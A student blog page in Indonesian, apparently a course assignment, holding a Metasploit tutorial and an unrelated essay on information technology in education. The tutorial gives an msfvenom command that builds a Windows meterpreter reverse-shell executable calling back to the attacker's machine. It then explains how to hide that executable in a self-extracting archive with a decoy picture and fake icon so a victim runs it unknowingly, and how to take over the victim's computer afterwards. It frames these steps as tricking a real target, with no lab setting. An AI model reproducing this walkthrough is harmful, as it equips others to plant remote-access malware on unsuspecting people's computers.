Rabu, 15 November 2017

Tugas SKK(Tutorial Exploit)C2016,FKTI,UNMUL

Assalammualaikum Wr.Wb,,,



Postingan saya kali ini tentang tutorial Exploid,, Ini merupakan tugas kelompok dari mata kuliah Sistem Keamana Komputer (SKK).  



Sebelumnya kita harus mengetahui terlebih dahulu apa sih itu Exploid? dan apa itu Payload?
Berikut adalah pengertian Exploid dan Payload,.



Pengertian Exploit
Exploit adalah sebuah kode yang menyerang keamanan komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Biasanya exploit mencari kelemahan dari variabel null ataupun variabel yang tidak terdefinisi untuk dimasukkan nilai lain sehingga terjadi error dan tidak membaca prosedur program seperti seharusnya, sehingga shellcode dapat dimasukkan untuk melaksanakan perintah atau command lainnya. Exploit biasa disisipi dengan shellcode.

Payload
Payload dalam dunia security yaitu pembawa exploit yang digunakan untuk mengeksekusi shellcode. Payload kemudian akan menjalankan shellcode yang dipilih pada target komputer untuk mendapatkan akses kedalam komputer tujuan (target).
 

Shellcode
Shellcode adalah kode yang digunakan dengan payload untuk mengeksploitasi komputer target. Biasanya shellcode dibuat untuk dapat mengontrol komputer, ataupun mendapatkan hak akses komputer target, atau yang lainnya. Shellcode dimasukkan kedalam kode exploit dengan tujuan membaypass fungsi suatu software, sehingga software tersebut tidak berjalan secara semestinya, melainkan menjalankan fungsi pada Shellcode.

Vulnerability
Dalam system security komputer, istilah Vulnerability merupakan suatu kelemahan yang memungkinkan seseorang untuk masuk dan mendapatkan hak akses kedalam komputer yang dituju(target). Biasanya vulnerability adalah kelemahan yang dikarenakan kesalahan setting ataupun ataupun ketidaktahuan administrator.


Cara melakukan Exploit


1.       Pertama kita harus mengetahui IP yang kita gunakan sebagai host untuk exploit ini
Sintax : ip addr show

2.      Seterusnya Membuat file payload-nya

contoh Sintax : msfvenom –p windows/meterpreter_reverse_tcp LHOST 192.168.1.12 LPORT=4444 –f exe > contoh.exe


 


3.       Setelah file dibuat, kita bisa membuat sedikit tipu helah agar payload kita tidak ketahuan(agar orang membuka payload tanpa sadar)
a.      Membuat icon
Bisa secara online pada web http://icoconvert.com/ seperti di bawah ini :



Lalu download icon yang sudah dibuat.



b.      Membuat file rar tipuan

Bahannya : 1. File payload yang kita buat tadi

                           2. satu file yang menjadi pengecoh (gambar,video,dll)

                           3. icon yang kita buat tadi

Lalu ikuti langkah-langkah seperti dibawah ini :


Ø  Blok file payload dan pengecoh, klik kanan lalu ADD to archive



   

Ø   Pada menu General, centangpada “ create SFX archive” danpada compression method –nyapilih “best” 



Ø  Pada Menu Advanced, klikpada “SFX options”
 


ØPada menu setup, masukkan nama kedua file yang di blok tadi pada “run after extraction”
 
Ø  Lalu pada menu Text and Icon, masukkan icon yang tadi kita buat pada “load SFX icon from file”lalu klik “OK”
 



 


 












Ø Tara!!! File tipuan telah jadi, dan siap di kontribusikan pada target, Dan ketika file ini di buka atau di extract, dia akan membuka/merunning otomatis file gambar (pengecoh) dan file payload yang kita buat tadi, dan si target akan terkecoh dengan gambar tanpa menyadari telah merunning file payload kita. 






c.   Setelah file exploit kita sudah di buka target, untuk mengexploitase pc/laptop korban, lakukan pada terminal kali linux dan menggunakan tool “Metasploit” dengan cara masukkan sintax seperti di bawah ini :




Lalu ketik sintax :exploit



Jreng-jreng-jreng setelah pc/laptop target telah terbaca, kita dapat mengexploitase pc/laptop target.


Misalnya untuk membaca system pc/laptop target kita dapat menggunakan
sintax : sysinfo





Selasa, 29 November 2016

Peran Teknologi Informasi dalam Dunia Pendidikan



Pengertian Teknologi Informasi
Teknologi Informasi dan Komunikasi (TIK) sebagai bagian dari ilmu pengetahuan dan teknologi secara umum adalah semua teknologi yang berhubungan dengan pengambilan, pengumpulan, pengolahan, penyimpanan, penyebaran, dan penyajian informasi. (Kementerian Negara Riset dan Teknologi, 2006: 6).
Teknologi Informasi adalah suatu teknologi yang digunakan untuk mengolah data, termasuk memproses, mendapatkan, menyusun, menyimpan, memanipulasi data dalam berbagai cara untuk menghasilkan informasi yang berkualitas, yaitu informasi yang relevan, akurat dan tepat waktu, yang digunakan untuk keperluan pribadi, bisnis, dan pemerintahan dan merupakan informasi yang strategis untuk pengambilan keputusan. Teknologi ini menggunakan seperangkat komputer untuk mengolah data, sistem jaringan untuk menghubungkan satu komputer dengan komputer yang lainnya sesuai dengan kebutuhan, dan teknologi telekomunikasi digunakan agar data dapat disebar dan diakses secara global. Arti teknologi informasi bagi dunia pendidikan seharusnya berarti tersedianya saluran atau sarana yang dapat dipakai untuk menyiarkan program pendidikan. Pemanfaatan teknologi informasi dalam bidang pendidikan sudah merupakan kelaziman. 
Membantu menyediakan komputer dan jaringan yang menghubungkan rumah murid dengan ruang kelas, guru, dan administrator sekolah. Semuanya dihubungkan ke Internet, dan para guru dilatih menggunakan komputer pribadi.  Peran yang dapat diberikan oleh aplikasi teknologi informasi ini adalah mendapatkan informasi untuk kehidupan pribadi seperti informasi tentang kesehatan, hobi, rekreasi, dan rohani. Kemudian untuk profesi seperti sains, teknologi, perdagangan, berita bisnis, dan asosiasi profesi. Sarana kerjasama antara pribadi atau kelompok yang satu dengan pribadi  atau kelompok yang lainnya tanpa mengenal batas jarak dan waktu, negara, ras, kelas ekonomi, ideologi atau faktor lainnya yang dapat menghambat bertukar pikiran.
Perkembangan Teknologi Informasi memacu suatu cara baru dalam kehidupan, dari kehidupan dimulai sampai dengan berakhir, kehidupan seperti ini dikenal dengan e-life, artinya kehidupan ini sudah dipengaruhi oleh berbagai kebutuhan secara elektronik. 
Jika dilihat pada saat sekarang ini perkembangan teknologi informasi terutama di Indonesia semakin berkembang. Dengan adanya teknologi informasi dan komunikasi dapat memudahkan kita untuk belajar dan mendapatkan informasi yang kita butuhkan dari mana saja, kapan saja, dan dari siapa saja. Dalam dunia pendidikan perkembangan teknologi informasi mulai dirasa mempunyai dampak yang positif karena dengan berkembangnya teknologi informasi dunia pendidikan mulai memperlihatkan perubahan yang cukup signifikan. Banyak hal yang dirasa berbeda dan berubah dibandingkan dengan cara yang berkembang sebelumnya. Saat sekarang ini jarak dan waktu bukanlah sebagai masalah yang berarti untuk mendapatkan ilmu, berbagai aplikasi tercipta untuk memfasilitasinya.
Di Indonesia yang notabenenya sebagai negara berkembang dimana ketersediaan infrastruktur komunikasi yang masih minim mengakibatkan kesempatan setiap orang untuk mendapatkan informasi dan pengetahuan menjadi terbatas. Ketersediaan infrastruktur ini sangat terasa di daerah-daerah yang proses memperoleh informasinya masih terbatas. Hal ini dikarenakan di Indonesia penyebaran teknologi informasi dan komunikasi belum merata, sekarang ini hanya di kota-kota besar sajalah yang sudah dengan mudah menikmati dan memanfaatkan fasilitas yang tersedia. Dengan demikian perkembangan pendidikan pun menjadi terhambat dan juga tidak merata.
Salah satu wadah yang dirasa paling berperan dalam dunia teknologi informasi dan komunikasi di Indonesia saat ini adalah internet. Di Indonesia terutama yang berada di kota-kota besar sudah banyak masyarakat yang mempunyai akses internet, sehingga pemanfaatan internet sebagai salah satu media pembelajaran dan pencarian informasi dan pengetahuan dapat lebih maksimal walaupun akses internet di Indonesia belum sepenuhnya dapat dirasakan semua orang.